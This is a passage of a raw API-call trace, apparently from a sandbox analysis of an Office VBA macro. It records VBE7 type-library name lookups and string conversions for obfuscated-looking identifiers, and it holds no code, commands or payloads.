ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.464] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HACA_C") returned 0x1084ff [0069.464] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="HACA_C" | out: _Dst="HACA_C") returned 0x0 [0069.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="HACA_C") returned 7 [0069.464] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.464] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="HACA_C", lHashVal=0x1084ff, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.464] IUnknown:Release (This=0x665ba50) returned 0xd [0069.464] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.464] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="HACA_C", lHashVal=0x1084ff, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.464] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.464] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.464] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="HACA_C", lHashVal=0x1084ff, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.464] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.464] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.464] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="HACA_C", lHashVal=0x1084ff, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.464] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80d5a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HACA_C") returned 7 [0069.464] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="HACA_C", lHashVal=0x1084ff, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.464] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.464] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b80d5a | out: _Dst=0x67c2d40) returned 0x0 [0069.464] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_HACA_C") returned 0x10ffa8 [0069.464] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_HACA_C" | out: _Dst="_B_var_HACA_C") returned 0x0 [0069.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_HACA_C") returned 14 [0069.464] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.464] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_HACA_C", lHashVal=0x10ffa8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.464] IUnknown:Release (This=0x665ba50) returned 0xd [0069.464] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.465] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_HACA_C", lHashVal=0x10ffa8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.465] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.465] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.465] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_HACA_C", lHashVal=0x10ffa8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.465] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.465] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.465] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_HACA_C", lHashVal=0x10ffa8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.465] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.465] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.465] IUnknown:Release (This=0x665ba50) returned 0xd [0069.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12e3e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_HACA_C") returned 14 [0069.465] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_HACA_C", lHashVal=0x10ffa8, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x5f004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x5f004100000000, pDummy=0x0) returned 0x0 [0069.465] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b80d5a | out: _Dst=0x144ec0) returned 0x0 [0069.465] ITypeComp:RemoteBind (in: This=0x665ba60, szName="hAUc1A1", lHashVal=0x10e5f1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80d82, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="hAUc1A1") returned 8 [0069.465] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="hAUc1A1", lHashVal=0x10e5f1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80d82, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="hAUc1A1") returned 8 [0069.465] ITypeComp:RemoteBind (in: This=0x665bd30, szName="hAUc1A1", lHashVal=0x10e5f1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.465] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hAUc1A1") returned 0x10e5f1 [0069.465] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="hAUc1A1" | out: _Dst="hAUc1A1") returned 0x0 [0069.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="hAUc1A1") returned 8 [0069.466] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.466] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="hAUc1A1", lHashVal=0x10e5f1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.466] IUnknown:Release (This=0x665ba50) returned 0xd [0069.466] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.466] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="hAUc1A1", lHashVal=0x10e5f1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.466] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.466] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.466] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="hAUc1A1", lHashVal=0x10e5f1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.466] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.466] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.466] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="hAUc1A1", lHashVal=0x10e5f1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.466] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80d82, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="hAUc1A1") returned 8 [0069.466] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="hAUc1A1", lHashVal=0x10e5f1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.466] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.466] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b80d82 | out: _Dst=0x67c2d40) returned 0x0 [0069.466] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_hAUc1A1") returned 0x10d9f4 [0069.466] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_hAUc1A1" | out: _Dst="_B_var_hAUc1A1") returned 0x0 [0069.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_hAUc1A1") returned 15 [0069.466] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.466] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_hAUc1A1", lHashVal=0x10d9f4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.466] IUnknown:Release (This=0x665ba50) returned 0xd [0069.466] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.466] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_hAUc1A1", lHashVal=0x10d9f4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.466] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.466] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.467] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_hAUc1A1", lHashVal=0x10d9f4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.467] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.467] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.467] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_hAUc1A1", lHashVal=0x10d9f4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.467] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.467] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.467] IUnknown:Release (This=0x665ba50) returned 0xd [0069.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12e6e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_hAUc1A1") returned 15 [0069.467] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_hAUc1A1", lHashVal=0x10d9f4, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x68005f00720061, ppTypeComp=0x31006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x68005f00720061, ppTypeComp=0x31006300000000, pDummy=0x0) returned 0x0 [0069.467] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b80d82 | out: _Dst=0x144ec0) returned 0x0 [0069.467] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.467] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.467] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.467] IUnknown:Release (This=0x665ba50) returned 0xd [0069.467] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.467] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.467] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.467] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.467] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.467] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.467] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.467] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.467] IUnknown:Release (This=0x665ba50) returned 0xd [0069.467] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.468] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.468] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.468] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.468] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.468] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.468] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.468] IUnknown:Release (This=0x665ba50) returned 0xd [0069.468] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.468] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.468] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.468] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.468] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.468] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.468] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.468] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.468] IUnknown:Release (This=0x665ba50) returned 0xd [0069.468] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.468] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.468] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.468] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.468] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.468] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.469] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.469] IUnknown:Release (This=0x665ba50) returned 0xd [0069.469] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.469] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.469] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.469] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.469] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.469] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.469] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.469] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.469] IUnknown:Release (This=0x665ba50) returned 0xd [0069.469] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.469] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.469] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.469] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.469] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.469] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.469] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.470] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.470] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.470] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.470] IUnknown:Release (This=0x665ba50) returned 0xd [0069.470] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.470] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.470] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.470] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.470] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.470] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.470] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.470] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.470] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.470] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.470] IUnknown:Release (This=0x665ba50) returned 0xd [0069.470] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.470] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.470] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80cde, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ckBAAU") returned 7 [0069.470] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ckBAAU", lHashVal=0x10fcd6, wFlags=0x5, 